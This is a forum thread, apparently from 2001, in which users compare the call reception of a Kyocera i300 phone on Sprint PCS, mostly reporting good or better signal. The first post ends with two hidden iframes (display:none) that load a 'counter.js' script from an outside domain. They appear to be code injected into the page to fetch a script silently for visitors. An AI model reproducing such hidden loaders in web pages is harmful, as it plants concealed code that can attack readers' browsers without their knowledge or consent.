+ Reply to Thread

Thread: Reliability

kj1

Question Reception/Reliability

I am in south florida and I am finding that this phone complete calls about 20% of the time, regardless of location or signal strength. Of course sprint says this isn't a problem, just normal useage. I used to have the kyocera 6035 and it had the best reception of any phone I have had (3 motorolas), but this phone is by far the worst. I have seen no complaints in this forum, so mabey its my handset. Phone has been active for only one day, but it has been unusable. Any help would be appreciated.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by kj1; 11-05-2001 at 11:31 PM.

I previously had AT&T in Portland, OR. Sprintpcs is as good or better. My two dead spots with AT&T are fine with Sprint. If you had sprint with the 6035, I definitely would suspect a bad I300.

I'm actually pleasantly surprised with the signal strength and quality. Might be a bad phone.

I had a Motoroloa Timeport. I used to be out of luck in my basement or at the edge of Sprint's coverage.

The i300 completes calls in my basement and edge of Sprint's coverage 100% of the time. The reception is much clearer.

In my situation, the i300 improved my cellular experience.

I agree with most of you here. My house, while in the middle of the Atlanta metro area is a dead spot for most cell phone providers (I am in the shadow of a mountain and suspect the shared tower is on the other side). W/VoiceStream I get NO signal, with AT&T, I would get a signal, but could not complete a call. (damn TDMA), with Sprint I still get a very marginal signal, but it is useable. With my Timeport and my 6035, I would complete about 60% of my calls, but walking around my house was a no-no on the phone. With the i300, it works very well. I am very please with the reception. Now if I could just get my hands on some accessories!
    cjg

I have the same recption with my I300 as I had on my prior Sprint phones--no worse and no better. And I'm the one who removed the antenna.

Administrator

Arrow

try putting your phone in SPrint only mode.... that will decrease power consumption some and would increase signal strength..

Better reception with I300

I have been a Sprint user for two years. For what ever reason, I am getting better coverage/reception with my I300 (1 week). I previously used a motorola star tac.

Administrator

Arrow

i, too have noticed better signal strength with the i300 over the 6035...